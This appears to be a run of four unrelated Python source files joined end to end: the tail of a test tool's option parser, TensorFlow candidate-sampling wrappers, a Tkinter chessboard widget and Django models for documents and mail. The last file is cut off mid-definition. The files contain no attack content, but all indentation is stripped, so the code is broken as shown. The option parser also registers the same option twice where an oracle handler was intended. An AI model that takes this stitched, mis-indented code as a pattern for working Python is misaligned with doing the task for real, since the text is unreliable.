# End of option, remaining arguments should be files.
return args[1:]
elif triplet == None:
# Unknown option, error.
_print_help()
error( "Unexpected option \"{}\".".format(option) )
new_line(1)
sys.exit(1)
else:
try: nu_args = triplet[2](args[1:])
except ValueError as e:
# Option handler crashed, error.
_print_help()
error( "Error on option \"{}\":".format(option) )
error( "> {}.".format(e) )
new_line(1)
sys.exit(1)
# Looping with updated tail of arguments.
# Not tail call optimization T_T.
else: return handle_options(nu_args)
if len(args) < 1:
_print_help()
error("No file specified.")
new_line(1)
sys.exit(1)
for f in _help_flags:
if f in args:
_print_help()
new_line(1)
sys.exit(0)
args = handle_options(args)
return args
# Building the list of options.
def _add_option(reps, desc, l4mbda):
""" Adds an option to the option list. """
_options.append((reps, desc, l4mbda))
def _add_option_header(lines):
""" Adds an option header to the option list. """
_options.append((
[],
lines,
"" # lambda tail: assert false
))
# Help option.
_add_option(
_help_flags,
["prints the help message and exits"],
lambda tail: _print_help_exit(0)
)
# Verbose option section header.
_add_option_header((
["Verbosity options."]
))
# Verbose option.
def _v_action(tail):
flags.set_log_lvl(3)
return tail
_add_option(
["-v"],
["verbose output"],
_v_action
)
# Quiet 1 option.
def _q1_action(tail):
flags.set_log_lvl(1)
return tail
_add_option(
["-q"],
["no output except errors and warnings"],
_q1_action
)
# Quiet 2 option.
def _q2_action(tail):
flags.set_log_lvl(0)
return tail
_add_option(
["-qq"],
["no output at all"],
_q2_action
)
# Test case construction section header.
_add_option_header((
["Test context construction options."]
))
# Adding binaries option.
def _add_binary_action(tail):
if len(tail) < 3: raise ValueError(
"expected three arguments but found {}".format(len(tail))
)
fst = tail[0]
snd = tail[1]
thd = tail[2]
triple = fst, snd, thd
if fst.startswith("-"): raise ValueError(
"expected binary name but found \"{}\"".format(fst)
)
if snd.startswith("-"): raise ValueError(
"expected binary command but found \"{}\"".format(snd)
)
if thd.startswith("-"): raise ValueError(
"expected test context file but found \"{}\"".format(thd)
)
if not os.path.isfile(thd): raise ValueError(
"test context file \"{}\" does not exist".format(thd)
)
flags.add_binary_to_add(triple)
return tail[3:]
_add_option(
["--add_bin"],
[
"> of n cmd ctxt (default {})".format(
flags.binaries_to_add_default()
),
"will add the binary with name \"n\", command \"cmd\" to the test",
"context in file \"ctxt\""
],
_add_binary_action
)
# Adding oracle option.
def _add_oracle_action(tail):
if len(tail) < 3: raise ValueError(
"expected three arguments but found {}".format(len(tail))
)
fst = tail[0]
snd = tail[1]
thd = tail[2]
triple = fst, snd, thd
if fst.startswith("-"): raise ValueError(
"expected oracle name but found \"{}\"".format(fst)
)
if snd.startswith("-"): raise ValueError(
"expected binary command but found \"{}\"".format(snd)
)
if thd.startswith("-"): raise ValueError(
"expected test context file but found \"{}\"".format(thd)
)
if not os.path.isfile(thd): raise ValueError(
"test context file \"{}\" does not exist".format(thd)
)
flags.add_binary_to_add(triple)
return tail[3:]
_add_option(
["--add_bin"],
[
"> of n cmd ctxt (default {})".format(
flags.binaries_to_add_default()
),
"will add the binary with name \"n\", command \"cmd\" to the test",
"context in file \"ctxt\""
],
_add_binary_action
)
# Test case type-check option.
def _type_check_action(tail):
flags.set_type_check_test_cases( lib.bool_of_string(tail[0]) )
return tail[1:]
_add_option(
["--type_check"],
[
"> of bool (default {})".format(
flags.type_check_test_cases_default()
),
"if true, test cases will be type checked (may be expensive",
"for large test cases)"
],
_type_check_action
)
# Test execution section header.
_add_option_header((
["Test execution options."]
))
# Run tests option.
def _run_tests_action(tail):
flags.set_run_tests( lib.bool_of_string(tail[0]) )
return tail[1:]
_add_option(
["--run_tests"],
[
"> bool (default {})".format(
flags.run_tests_default()
),
"if true, test cases will be executed"
],
_run_tests_action
)
# Max proc option.
def _max_proc_action(tail):
flags.set_max_proc( lib.int_of_string(tail[0]) )
return tail[1:]
_add_option(
["--max_proc"],
[
"> int (default {})".format(
flags.max_proc_default()
),
"maximum number of processes to run in parallel"
],
_max_proc_action
)
# Output directory option.
def _out_dir_action(tail):
path = tail[0]
iolib.is_legal_dir_path(
path,
if_not_there_do=(lambda: warning(
("Output directory \"{}\" does not exist "
"and will be created.\n").format(path)
))
)
flags.set_out_dir(path)
return tail[1:]
_add_option(
["--out_dir"],
[
"> path (default {})".format(
flags.out_dir_default()
),
"sets the output directory"
],
_out_dir_action
)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Wrappers for primitive Neural Net (NN) Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_candidate_sampling_ops
from tensorflow.python.ops import math_ops
def uniform_candidate_sampler(true_classes, num_true, num_sampled, unique,
range_max, seed=None, name=None):
"""Samples a set of classes using a uniform base distribution.
This operation randomly samples a tensor of sampled classes
(`sampled_candidates`) from the range of integers `[0, range_max)`.
The elements of `sampled_candidates` are drawn without replacement
(if `unique=True`) or with replacement (if `unique=False`) from
the base distribution.
The base distribution for this operation is the uniform distribution
over the range of integers `[0, range_max)`.
In addition, this operation returns tensors `true_expected_count`
and `sampled_expected_count` representing the number of times each
of the target classes (`true_classes`) and the sampled
classes (`sampled_candidates`) is expected to occur in an average
tensor of sampled classes. These values correspond to `Q(y|x)`
defined in [this
document](http://www.tensorflow.org/extras/candidate_sampling.pdf).
If `unique=True`, then these are post-rejection probabilities and we
compute them approximately.
Args:
true_classes: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_true: An `int`. The number of target classes per training example.
num_sampled: An `int`. The number of classes to randomly sample per batch.
unique: A `bool`. Determines whether all sampled classes in a batch are
unique.
range_max: An `int`. The number of possible classes.
seed: An `int`. An operation-specific seed. Default is 0.
name: A name for the operation (optional).
Returns:
sampled_candidates: A tensor of type `int64` and shape `[num_sampled]`.
The sampled classes.
true_expected_count: A tensor of type `float`. Same shape as
`true_classes`. The expected counts under the sampling distribution
of each of `true_classes`.
sampled_expected_count: A tensor of type `float`. Same shape as
`sampled_candidates`. The expected counts under the sampling distribution
of each of `sampled_candidates`.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_candidate_sampling_ops._uniform_candidate_sampler(
true_classes, num_true, num_sampled, unique, range_max, seed=seed1,
seed2=seed2, name=name)
def log_uniform_candidate_sampler(true_classes, num_true, num_sampled, unique,
range_max, seed=None, name=None):
"""Samples a set of classes using a log-uniform (Zipfian) base distribution.
This operation randomly samples a tensor of sampled classes
(`sampled_candidates`) from the range of integers `[0, range_max)`.
The elements of `sampled_candidates` are drawn without replacement
(if `unique=True`) or with replacement (if `unique=False`) from
the base distribution.
The base distribution for this operation is an approximately log-uniform
or Zipfian distribution:
`P(class) = (log(class + 2) - log(class + 1)) / log(range_max + 1)`
This sampler is useful when the target classes approximately follow such
a distribution - for example, if the classes represent words in a lexicon
sorted in decreasing order of frequency. If your classes are not ordered by
decreasing frequency, do not use this op.
In addition, this operation returns tensors `true_expected_count`
and `sampled_expected_count` representing the number of times each
of the target classes (`true_classes`) and the sampled
classes (`sampled_candidates`) is expected to occur in an average
tensor of sampled classes. These values correspond to `Q(y|x)`
defined in [this
document](http://www.tensorflow.org/extras/candidate_sampling.pdf).
If `unique=True`, then these are post-rejection probabilities and we
compute them approximately.
Args:
true_classes: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_true: An `int`. The number of target classes per training example.
num_sampled: An `int`. The number of classes to randomly sample per batch.
unique: A `bool`. Determines whether all sampled classes in a batch are
unique.
range_max: An `int`. The number of possible classes.
seed: An `int`. An operation-specific seed. Default is 0.
name: A name for the operation (optional).
Returns:
sampled_candidates: A tensor of type `int64` and shape `[num_sampled]`.
The sampled classes.
true_expected_count: A tensor of type `float`. Same shape as
`true_classes`. The expected counts under the sampling distribution
of each of `true_classes`.
sampled_expected_count: A tensor of type `float`. Same shape as
`sampled_candidates`. The expected counts under the sampling distribution
of each of `sampled_candidates`.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_candidate_sampling_ops._log_uniform_candidate_sampler(
true_classes, num_true, num_sampled, unique, range_max, seed=seed1,
seed2=seed2, name=name)
def learned_unigram_candidate_sampler(true_classes, num_true, num_sampled,
unique, range_max, seed=None, name=None):
"""Samples a set of classes from a distribution learned during training.
This operation randomly samples a tensor of sampled classes
(`sampled_candidates`) from the range of integers `[0, range_max)`.
The elements of `sampled_candidates` are drawn without replacement
(if `unique=True`) or with replacement (if `unique=False`) from
the base distribution.
The base distribution for this operation is constructed on the fly
during training. It is a unigram distribution over the target
classes seen so far during training. Every integer in `[0, range_max)`
begins with a weight of 1, and is incremented by 1 each time it is
seen as a target class. The base distribution is not saved to checkpoints,
so it is reset when the model is reloaded.
In addition, this operation returns tensors `true_expected_count`
and `sampled_expected_count` representing the number of times each
of the target classes (`true_classes`) and the sampled
classes (`sampled_candidates`) is expected to occur in an average
tensor of sampled classes. These values correspond to `Q(y|x)`
defined in [this
document](http://www.tensorflow.org/extras/candidate_sampling.pdf).
If `unique=True`, then these are post-rejection probabilities and we
compute them approximately.
Args:
true_classes: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_true: An `int`. The number of target classes per training example.
num_sampled: An `int`. The number of classes to randomly sample per batch.
unique: A `bool`. Determines whether all sampled classes in a batch are
unique.
range_max: An `int`. The number of possible classes.
seed: An `int`. An operation-specific seed. Default is 0.
name: A name for the operation (optional).
Returns:
sampled_candidates: A tensor of type `int64` and shape `[num_sampled]`.
The sampled classes.
true_expected_count: A tensor of type `float`. Same shape as
`true_classes`. The expected counts under the sampling distribution
of each of `true_classes`.
sampled_expected_count: A tensor of type `float`. Same shape as
`sampled_candidates`. The expected counts under the sampling distribution
of each of `sampled_candidates`.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_candidate_sampling_ops._learned_unigram_candidate_sampler(
true_classes, num_true, num_sampled, unique, range_max, seed=seed1,
seed2=seed2, name=name)
def fixed_unigram_candidate_sampler(true_classes,
num_true,
num_sampled,
unique,
range_max,
vocab_file='',
distortion=1.0,
num_reserved_ids=0,
num_shards=1,
shard=0,
unigrams=(),
seed=None,
name=None):
"""Samples a set of classes using the provided (fixed) base distribution.
This operation randomly samples a tensor of sampled classes
(`sampled_candidates`) from the range of integers `[0, range_max)`.
The elements of `sampled_candidates` are drawn without replacement
(if `unique=True`) or with replacement (if `unique=False`) from
the base distribution.
The base distribution is read from a file or passed in as an
in-memory array. There is also an option to skew the distribution by
applying a distortion power to the weights.
In addition, this operation returns tensors `true_expected_count`
and `sampled_expected_count` representing the number of times each
of the target classes (`true_classes`) and the sampled
classes (`sampled_candidates`) is expected to occur in an average
tensor of sampled classes. These values correspond to `Q(y|x)`
defined in [this
document](http://www.tensorflow.org/extras/candidate_sampling.pdf).
If `unique=True`, then these are post-rejection probabilities and we
compute them approximately.
Args:
true_classes: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_true: An `int`. The number of target classes per training example.
num_sampled: An `int`. The number of classes to randomly sample per batch.
unique: A `bool`. Determines whether all sampled classes in a batch are
unique.
range_max: An `int`. The number of possible classes.
vocab_file: Each valid line in this file (which should have a CSV-like
format) corresponds to a valid word ID. IDs are in sequential order,
starting from num_reserved_ids. The last entry in each line is expected
to be a value corresponding to the count or relative probability. Exactly
one of `vocab_file` and `unigrams` needs to be passed to this operation.
distortion: The distortion is used to skew the unigram probability
distribution. Each weight is first raised to the distortion's power
before adding to the internal unigram distribution. As a result,
`distortion = 1.0` gives regular unigram sampling (as defined by the vocab
file), and `distortion = 0.0` gives a uniform distribution.
num_reserved_ids: Optionally some reserved IDs can be added in the range
`[0, num_reserved_ids]` by the users. One use case is that a special
unknown word token is used as ID 0. These IDs will have a sampling
probability of 0.
num_shards: A sampler can be used to sample from a subset of the original
range in order to speed up the whole computation through parallelism. This
parameter (together with `shard`) indicates the number of partitions that
are being used in the overall computation.
shard: A sampler can be used to sample from a subset of the original range
in order to speed up the whole computation through parallelism. This
parameter (together with `num_shards`) indicates the particular partition
number of the operation, when partitioning is being used.
unigrams: A list of unigram counts or probabilities, one per ID in
sequential order. Exactly one of `vocab_file` and `unigrams` should be
passed to this operation.
seed: An `int`. An operation-specific seed. Default is 0.
name: A name for the operation (optional).
Returns:
sampled_candidates: A tensor of type `int64` and shape `[num_sampled]`.
The sampled classes.
true_expected_count: A tensor of type `float`. Same shape as
`true_classes`. The expected counts under the sampling distribution
of each of `true_classes`.
sampled_expected_count: A tensor of type `float`. Same shape as
`sampled_candidates`. The expected counts under the sampling distribution
of each of `sampled_candidates`.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_candidate_sampling_ops._fixed_unigram_candidate_sampler(
true_classes, num_true, num_sampled, unique, range_max,
vocab_file=vocab_file, distortion=distortion,
num_reserved_ids=num_reserved_ids, num_shards=num_shards, shard=shard,
unigrams=unigrams, seed=seed1, seed2=seed2, name=name)
def all_candidate_sampler(true_classes, num_true, num_sampled, unique,
seed=None, name=None):
"""Generate the set of all classes.
Deterministically generates and returns the set of all possible classes.
For testing purposes. There is no need to use this, since you might as
well use full softmax or full logistic regression.
Args:
true_classes: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
num_true: An `int`. The number of target classes per training example.
num_sampled: An `int`. The number of possible classes.
unique: A `bool`. Ignored.
unique.
seed: An `int`. An operation-specific seed. Default is 0.
name: A name for the operation (optional).
Returns:
sampled_candidates: A tensor of type `int64` and shape `[num_sampled]`.
This operation deterministically returns the entire range
`[0, num_sampled]`.
true_expected_count: A tensor of type `float`. Same shape as
`true_classes`. The expected counts under the sampling distribution
of each of `true_classes`. All returned values are 1.0.
sampled_expected_count: A tensor of type `float`. Same shape as
`sampled_candidates`. The expected counts under the sampling distribution
of each of `sampled_candidates`. All returned values are 1.0.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_candidate_sampling_ops._all_candidate_sampler(
true_classes, num_true, num_sampled, unique, seed=seed1, seed2=seed2,
name=name)
def compute_accidental_hits(true_classes, sampled_candidates, num_true,
seed=None, name=None):
"""Compute the position ids in `sampled_candidates` matching `true_classes`.
In Candidate Sampling, this operation facilitates virtually removing
sampled classes which happen to match target classes. This is done
in Sampled Softmax and Sampled Logistic.
See our [Candidate Sampling Algorithms
Reference](http://www.tensorflow.org/extras/candidate_sampling.pdf).
We presuppose that the `sampled_candidates` are unique.
We call it an 'accidental hit' when one of the target classes
matches one of the sampled classes. This operation reports
accidental hits as triples `(index, id, weight)`, where `index`
represents the row number in `true_classes`, `id` represents the
position in `sampled_candidates`, and weight is `-FLOAT_MAX`.
The result of this op should be passed through a `sparse_to_dense`
operation, then added to the logits of the sampled classes. This
removes the contradictory effect of accidentally sampling the true
target classes as noise classes for the same example.
Args:
true_classes: A `Tensor` of type `int64` and shape `[batch_size,
num_true]`. The target classes.
sampled_candidates: A tensor of type `int64` and shape `[num_sampled]`.
The sampled_candidates output of CandidateSampler.
num_true: An `int`. The number of target classes per training example.
seed: An `int`. An operation-specific seed. Default is 0.
name: A name for the operation (optional).
Returns:
indices: A `Tensor` of type `int32` and shape `[num_accidental_hits]`.
Values indicate rows in `true_classes`.
ids: A `Tensor` of type `int64` and shape `[num_accidental_hits]`.
Values indicate positions in `sampled_candidates`.
weights: A `Tensor` of type `float` and shape `[num_accidental_hits]`.
Each value is `-FLOAT_MAX`.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_candidate_sampling_ops._compute_accidental_hits(
true_classes, sampled_candidates, num_true, seed=seed1, seed2=seed2,
name=name)
@ops.RegisterShape("AllCandidateSampler")
@ops.RegisterShape("FixedUnigramCandidateSampler")
@ops.RegisterShape("LearnedUnigramCandidateSampler")
@ops.RegisterShape("LogUniformCandidateSampler")
@ops.RegisterShape("ThreadUnsafeUnigramCandidateSampler")
@ops.RegisterShape("UniformCandidateSampler")
def _CandidateSamplerShape(op):
true_classes_shape = op.inputs[0].get_shape().with_rank(2)
batch_size = true_classes_shape[0]
num_sampled = op.get_attr("num_sampled")
num_true = op.get_attr("num_true")
return [tensor_shape.vector(num_sampled),
tensor_shape.matrix(batch_size, num_true),
tensor_shape.vector(num_sampled)]
@ops.RegisterShape("ComputeAccidentalHits")
def _ComputeAccidentalHitsShape(op):
num_true = op.get_attr("num_true")
# Validate that the input shape matches the attrs, even though it
# does not influence the shape of the output.
true_candidates_shape = op.inputs[0].get_shape().merge_with(
tensor_shape.matrix(None, num_true))
output_shape = tensor_shape.vector(None)
return [output_shape] * 3
| |
#!/usr/bin/python
# Copyright 2012, 2013 Andrew Lamoureux
#
# This file is a part of FunChess
#
# FunChess is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#!/usr/bin/python
import re
import sys
import Tkinter
import Common
from ChessState import ChessState
class ChessBoard(Tkinter.Frame):
def __init__(self, parent, pieceWidth=48, pieceHeight=48):
Tkinter.Frame.__init__(self, parent)
self.parent = parent
self.chessState = {}
self.flippedDisplay = 0
self.pieceWidth = pieceWidth
self.pieceHeight = pieceHeight
self.width = 8*pieceWidth
self.height = 8*pieceHeight
self.canvas = Tkinter.Canvas(self, width=self.width, height=self.height)
# [0,1,2,...] = [a8,a7,a6,...]
self.state = [' ']*64
self.stateImg = [None]*64
# bitmaps
# maps 'bdd' to 'bdd48.gif', etc.
self.bitmapFiles = {}
# maps 'bdd' to PhotoImage instance, etc.
self.bitmaps = {}
self.loadBitmaps()
#
self.canvas.grid(row=0, column=0)
def setState(self, state):
self.chessState = state.copy()
def setFEN(self, fen):
self.chessState = ChessState(fen)
#--------------------------------------------------------------------------
# drawing stuff
#--------------------------------------------------------------------------
# maps {p,b,n,r,q,k,P,B,N,R,Q,K} X {0,1} to eg: "bdd48"
#
def fenPieceToBitmapFileRootName(self, p, square):
# square is either 'd'/0 (dark) or 'l'/1 (light)
mapping = { 'P':'pl', 'p':'pd',
'B':'bl', 'b':'bd',
'N':'nl', 'n':'nd',
'R':'rl', 'r':'rd',
'Q':'ql', 'q':'qd',
'K':'kl', 'k':'kd'
}
colorChar = ['d', 'l'][square]
if p == ' ':
return colorChar + 'sq48'
else:
if not p in mapping:
raise "invalid piece!"
return mapping[p] + colorChar + '48'
def fenPieceToBitmap(self, p, square):
rootName = self.fenPieceToBitmapFileRootName(p, square)
return self.bitmaps[rootName]
def fenPieceToBitmap(self, p, square):
rootName = self.fenPieceToBitmapFileRootName(p, square)
return self.bitmaps[rootName]
def fenPieceToBitmapFile(self, p, square):
rootName = self.fenPieceToBitmapFileRootName(p, square)
return './images/' + rootName + '.gif'
def flip(self):
self.flippedDisplay = (self.flippedDisplay + 1) & 1
def loadBitmaps(self):
imageFiles = [ \
'bdd48.gif', 'dsq48.gif', 'kll48.gif', 'nld48.gif', 'pld48.gif', 'qld48.gif', \
'bdl48.gif', 'kdd48.gif', 'lsq48.gif', 'nll48.gif', 'pll48.gif', 'qll48.gif', \
'rld48.gif', 'bld48.gif', 'kdl48.gif', 'ndd48.gif', 'pdd48.gif', 'qdd48.gif', \
'rdd48.gif', 'rll48.gif', 'bll48.gif', 'kld48.gif', 'ndl48.gif', 'pdl48.gif', \
'qdl48.gif', 'rdl48.gif']
for imgF in imageFiles:
# strip off the ".gif" - keys are just "bdd", "dsq", etc.
key = re.sub(r'^(.*)\.gif$', r'\1', imgF)
imgPath = './images/' + imgF
#print 'setting self.bitmaps[%s] = %s' % (key, imgPath)
self.bitmapFiles[key] = imgPath
self.bitmaps[key] = Tkinter.PhotoImage(file=imgPath)
def draw(self):
if not self.chessState:
raise Exception("ChessBoard cannot draw without chessState being set!")
pieceGetSequence = range(64)
if self.flippedDisplay:
pieceGetSequence.reverse()
for i in range(64):
xCoord = self.pieceWidth/2 + self.pieceWidth * (i%8)
yCoord = self.pieceHeight/2 + self.pieceHeight * (i/8)
#print 'drawing a %s at (%d,%d)' % (self.state[i], xCoord, yCoord)
self.stateImg[i] = self.canvas.create_image( \
[xCoord, yCoord], \
image = self.fenPieceToBitmap( \
self.chessState.squares[ \
Common.squaresSan[pieceGetSequence[i]] \
], \
(i + i/8 + 1)%2 \
)
)
def draw_html(self):
if not self.chessState:
raise Exception("ChessBoard cannot draw without chessState being set!")
html = '<table border=0 cellpadding=0 cellspacing=0>\n'
pieceGetSequence = range(64)
if self.flippedDisplay:
pieceGetSequence.reverse()
html += '<tr>\n'
for i in range(64):
# end current row, start new row
if not (i%8):
html += '\n</tr>\n'
html += '<tr>\n'
# table cell has image in it
# get either 0,1,2,... or 63,62,61,...
tmp = pieceGetSequence[i]
# map 0->'a8', 63->'h1', etc.
tmp = Common.squaresSan[tmp]
# map 'a8' to 'r' or 'R' for example (getting piece)
tmp = self.chessState.squares[tmp]
# finally, map that piece to a filename
tmp = self.fenPieceToBitmapFile(tmp, (i+i/8+1)%2)
html += ' <td><img src="%s" /></td>\n' % tmp
html += '\n</tr>\n'
html += '</table>\n'
return html
# test frame that holds a ChessBoard widget
#
class ChessBoardTest(Tkinter.Frame):
def __init__(self, parent, pieceWidth=48, pieceHeight=48):
Tkinter.Frame.__init__(self, parent)
self.parent = parent
self.chessState = ChessState(Common.initChessFEN)
self.cb = ChessBoard(self)
self.cb.setState(self.chessState)
self.cb.draw()
self.cb.pack()
self.b = Tkinter.Button(self, text="flip", command=self.flipIt)
self.b.pack()
self.b = Tkinter.Button(self, text="html", command=self.html)
self.b.pack()
self.moveEntry = Tkinter.Entry(self)
self.moveEntry.pack()
self.execMove = Tkinter.Button(self, text="execute move", command=self.executeMove)
self.execMove.pack()
def flipIt(self):
self.cb.flip()
self.cb.draw()
def html(self):
print self.cb.draw_html()
def executeMove(self):
whatMove = self.moveEntry.get()
print "Executing: " + whatMove
self.chessState = self.chessState.transition(whatMove)
self.cb.setState(self.chessState)
self.cb.draw()
def doTest():
# root window
root = Tkinter.Tk()
root.wm_title("Chess Board Test\n")
# reserve board on root
cbt = ChessBoardTest(root)
cbt.pack()
# run
root.mainloop()
if __name__ == "__main__":
doTest()
| |
""" Core Models """
#
# pylint: disable-msg=R0903,R0904,W0232
#
# R0903 - too few public methods
# R0904 - too many public methods
# W0232 = class has no __init__ method
#
from django.contrib.auth.models import User
from django.db import models
from django.contrib.localflavor.us.models import PhoneNumberField
from django.db.models import permalink
from django.utils.timesince import timesince
from datetime import datetime
import time
import logging
logging = logging.getLogger('models')
###############################################################################
def manager(model):
"""
Helper function to get the manger for a model, without triggering
pylint errors.
"""
return model.objects
###############################################################################
class FaxNumber(models.Model):
"""
Associates a fax number with a user. The fax number can be one
from which the user sends faxes (i.e., an external number from
which the fax will be sent) or a number at which the user's acount
receives faxes (i.e., an internal number).
"""
USER_SENDS_FROM = 'E' # External
USER_RECVS_AT = 'I' # Internal
user = models.ForeignKey(
User,
related_name = 'fax_numbers')
number = PhoneNumberField(
blank = False,
db_index = True,
unique = True )
type = models.CharField(
max_length = 1,
default = USER_SENDS_FROM,
choices = [ (USER_SENDS_FROM, 'External Sender #'),
(USER_RECVS_AT, 'Internal Receive #') ])
__str__ = lambda self : self.number
__unicode__ = __str__
###############################################################################
class MimeType(models.Model):
"""
A MIME content type for an asset. This class exists simply to
normalize the database.
"""
JPEG = 'image/jpeg'
PNG = 'image/png'
PDF = 'application/pdf'
TEXT = 'text/plain'
HTML = 'text/html'
MAIL = 'message/rfc822'
TIFF = 'image/tiff'
BINARY = 'application/octet-stream'
TEXT = 'text/plain'
name = models.CharField(
max_length = 64,
blank = False,
null = False,
unique = True,
db_index = True )
extension = models.CharField(
max_length = 15,
blank = True,
null = False,
db_index = True,
unique = True )
__str__ = lambda self : self.name
__unicode__ = __str__
###############################################################################
class Process(models.Model):
""" A type of process that can be performed on a document.
For example:
- import
- split
- normalize
- ocr
- index
"""
name = models.SlugField(
max_length = 64,
unique = True,
db_index = True,
help_text = 'A unique identifier for this process.' )
mime_types = models.ManyToManyField(
MimeType,
related_name = 'consumers' )
is_gateway = property( lambda self: self.inputs.all().count() == 0 )
__str__ = lambda self : self.name
__unicode__ = __str__
###############################################################################
class Node(models.Model):
""" A host participating in the document processing pipeline
"""
address = models.IPAddressField(
unique = True,
db_index = True )
__str__ = lambda self : self.address
__unicode__ = __str__
###############################################################################
class Processor(models.Model):
""" An instance of a process type, given by the ip address on which the
process is running.
"""
process = models.ForeignKey(
Process,
related_name = 'processors')
node = models.ForeignKey(
Node,
related_name = 'processors')
name = property(
lambda self: '%s@%s' % (self.process, self.node) )
inputs = property(
lambda self : self.process.inputs )
outputs = property(
lambda self : self.process.outputs )
__str__ = lambda self : self.name
__unicode__ = __str__
###############################################################################
class TagManager( models.Manager ):
""" Django model manager class for Tag objects """
def get_or_create_from_label_list( self, owner, label_list ):
"""
Return a list of tags for the given owner, based on the list of
provided labels.
"""
return [
self.get_or_create(
owner = owner,
label = label.strip().lower() ) [0]
for label in label_list ]
def delete_unused_tags( self, owner ):
"""
Delete all of owner's tags for which there are no tagged documents
"""
self.filter(
owner = owner,
documents__isnull = True).delete()
###############################################################################
class Tag(models.Model):
USER = 'user'
UPLOAD_AGGREGATE = 'upload'
MAIL_GMAIL_LABEL = 'mail/gmail-label'
MAIL_IMAP_FOLDER = 'mail/imap-folder'
MAIL_INBOX = 'mail/imap-inbox'
MAIL_IMAP_FLAG_SEEN = 'mail/imap-flag/seen'
""" Documents can be tagged """
objects = TagManager()
owner = models.ForeignKey(
User,
related_name = 'tags')
label = models.CharField(
max_length = 64,
blank = False,
null = False,
db_index = True )
tag_class = models.CharField(
max_length = 64,
blank = True,
default = '',
db_index = True,
help_text = 'Class of this tag' )
date_created = models.DateTimeField(
auto_now_add = True )
date_last_modified = models.DateTimeField(
auto_now = True )
__str__ = lambda self : self.label
__unicode__ = __str__
class Meta:
""" Constraints """
unique_together = ( 'owner', 'label' )
###############################################################################
class Document(models.Model):
""" A collection of pages """
owner = models.ForeignKey(
User,
related_name = 'documents')
title = models.CharField(
max_length = 255,
blank = True,
default = '' )
num_pages = property(
lambda self: self.pages.count() )
tags = models.ManyToManyField(
Tag,
related_name = 'documents',
blank = True,
symmetrical = True )
__str__ = lambda self : self.title
__unicode__ = __str__
get_absolute_url = permalink(
lambda self : ('document_info', (), { 'id' : self.pk }))
class Meta:
ordering = ('-title',)
###############################################################################
class Page(models.Model):
""" A positional element of a document """
owner = models.ForeignKey(
User,
related_name = 'pages')
document = models.ForeignKey(
Document,
related_name = 'pages')
position = models.PositiveIntegerField()
description = property(
lambda self: '%s (%s / %s)' % (
self.document.title,
self.position,
self.document.num_pages ))
__str__ = lambda self : self.description
__unicode__ = __str__
get_absolute_url = permalink(
lambda self : ('page_info', (), {'id': self.pk }))
def get_asset(self, asset_class):
""" Get an asset associated with this page """
# E1101 = instance of 'Page' has no 'assets' member
# pylint: disable-msg=E1101
if isinstance(asset_class, AssetClass):
return self.assets.get(asset_class__pk = asset_class.pk)
else:
return self.assets.get(asset_class__name = asset_class)
# pylint: enable-msg=E1101
###############################################################################
class Contact(models.Model):
BUSINESS = 1
PERSON = 2
""" A contact has a name and a set of email addresses"""
owner = models.ForeignKey(
User,
related_name = 'contacts')
name = models.CharField(max_length=128)
type = models.IntegerField(default = PERSON)
tags = models.ManyToManyField(
Tag,
related_name = 'contacts',
blank = True,
symmetrical = True )
__str__ = lambda self : str(unicode(self).encode('ascii','replace'))
__unicode__ = lambda self : unicode('%s (%s)' % (self.name, self.pk))
###############################################################################
class Address(models.Model):
""" Email contact """
email = models.EmailField(primary_key=True,
blank = False)
contact = models.ForeignKey(Contact,
related_name = 'addresses')
owner = models.ForeignKey(
User,
related_name = 'addresses')
__str__ = lambda self : str(unicode(self).encode('ascii','replace'))
__unicode__ = lambda self : unicode('%s <%s>' % (self.contact.name, self.email))
###############################################################################
class Message(models.Model):
STATUS_READY = 1 # fully-formed message, all assets are processed
STATUS_DELETED = -1 # deleted message, assets are no longer accessible
STATUS_REFERENCE = 0 # message created on the basis of a reference.
# assets are not yet available
def save(self, *args, **kwargs):
"""
Overwriting save to set created_date and modified_date to utcnow()
Django uses datetime.now()
We want to store and transmit only UTC time, and localize it at rendering time
"""
if not self.created_date:
self.created_date = datetime.utcnow()
self.modified_date = datetime.utcnow()
super(Message, self).save(*args, **kwargs)
""" A Message """
message_id = models.CharField(
max_length = 512,
blank = False,
null = False,
db_index = True)
owner = models.ForeignKey(
User,
related_name = 'messages')
subject = models.CharField(
max_length = 512,
blank = True,
null = True)
summary = models.CharField(
max_length = 1024,
blank = False,
null = False)
date = models.DateTimeField(null = True)
modified_date = models.DateTimeField(null = True)
created_date = models.DateTimeField(null = True)
status = models.IntegerField()
reply_to = models.ForeignKey('self',
null = True,
related_name = 'reply_messages')
sender_address = models.ForeignKey(Address,
null = True,
related_name = 'sent_messages')
# Not the same thing as to_address
# to_address may be empty (in case of BCC or be set to the
# address of a mailling list
# mailbox address is the email address of one of the email
# accounts for a given user
mailbox_address = models.ForeignKey(Address,
related_name = 'mailbox_messages')
to_addresses = models.ManyToManyField(Address,
blank = True,
null = True,
